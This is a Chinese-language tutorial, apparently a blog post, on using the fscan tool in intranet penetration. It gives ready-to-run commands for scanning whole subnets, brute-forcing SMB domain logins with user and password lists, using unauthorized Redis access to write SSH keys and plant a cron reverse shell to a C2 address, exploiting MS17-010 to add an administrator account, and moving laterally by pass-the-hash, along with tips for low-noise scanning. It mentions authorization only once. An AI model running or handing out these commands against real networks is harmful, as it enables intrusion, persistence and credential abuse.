告别手动拼接命令!fscan实战:从B段扫描到Redis一键写公钥的保姆级参数指南
告别手动拼接命令!fscan实战:从B段扫描到Redis一键写公钥的保姆级参数指南
第一次在内网渗透中遇到B段资产测绘任务时,我像大多数新手一样,手忙脚乱地切换着nmap、hydra和redis-cli。直到发现fscan这个"瑞士军刀",才明白原来扫描、爆破、漏洞利用可以像搭积木一样自由组合。本文将分享如何用参数组合拳实现高效内网穿透,这些技巧都是我在三次企业级红队演练中验证过的实战经验。
1. 环境准备与基础扫描策略
工欲善其事,必先利其器。在开始前需要准备:
- 最新版fscan二进制文件(建议从官方仓库获取)
- 至少2GB内存的Linux主机(避免扫描大网段时OOM)
- 稳定的网络环境(扫描B段时建议10Mbps以上带宽)
基础扫描命令对比表:
| 场景 | 命令示例 | 优势 | 注意事项 |
|---|---|---|---|
| 快速存活探测 | ./fscan -h 10.0.0.0/24 -np -nobr -nopoc | 最低网络消耗 | 可能漏掉禁ping主机 |
| 全端口扫描 | ./fscan -h 192.168.1.1-254 -p 1-65535 | 信息最完整 | 耗时可能超过8小时 |
| 精准服务识别 | ./fscan -h 172.16.1.1/24 -m ssh,redis | 针对性最强 | 需预判目标服务 |
提示:企业内网扫描前务必获取书面授权,我曾见过因为扫描财务子网触发IDS导致整个红队行动终止的案例。
2. 高级参数组合技巧
2.1 低干扰扫描方案
当需要隐蔽资产梳理时,这个组合能减少90%的流量特征:
./fscan -hf targets.txt -nobr -nopoc -t 200 -silent-hf从文件读取目标(避免重复输入)-t降低线程数(默认600线程太显眼)-silent关闭实时输出(适合C2环境)
2.2 Redis自动化利用链
发现未授权Redis时,这套组合能自动完成密钥写入:
./fscan -h 10.2.3.0/24 -rf ~/.ssh/id_rsa.pub -rs 你的C2_IP:4444执行后会产生两个利用尝试:
- 将公钥写入
/root/.ssh/authorized_keys - 创建计划任务反弹shell
注意:部分Redis版本需要先执行
config set dir切换目录,这时就需要手动干预了。
3. 典型场景实战案例
3.1 域环境快速突破
遇到Windows域时,这个组合屡试不爽:
./fscan -h 192.168.88.0/24 -m smb -userf domain_users.txt -pwdf top100_pwd.txt -domain CORP关键参数解析:
-domain指定域名(否则NTLM认证会失败)-userf使用预收集的域账号列表- 爆破成功会自动识别域控
3.2 专项漏洞打击
针对MS17-010的精准打击:
./fscan -h 172.16.100.1-200 -m ms17010 -sc add -t 50-sc add自动添加管理员账户- 线程调低避免蓝屏(血泪教训)
4. 异常处理与优化建议
4.1 常见报错解决方案
连接重置问题:
# 调整超时和重试参数 ./fscan -h 10.10.1.1/24 -time 5 -debug 120内存不足处理:
# 限制扫描范围并分批次执行 split -l 50 targets.txt batch_ for file in batch_*; do ./fscan -hf $file -o ${file}_result; done4.2 性能调优参数
| 参数 | 推荐值 | 适用场景 |
|---|---|---|
-t | 300-800 | 千兆网络建议500线程 |
-time | 3-8秒 | 跨国网络建议调高 |
-num | 10-30 | Web扫描速率控制 |
最后分享一个真实案例:在某次演练中,通过-m smb2 -hash xxxxx参数成功利用Pass-the-Hash横向移动,这比常规爆破效率高出20倍。工具终究是工具,真正的魔法在于如何组合这些参数模块。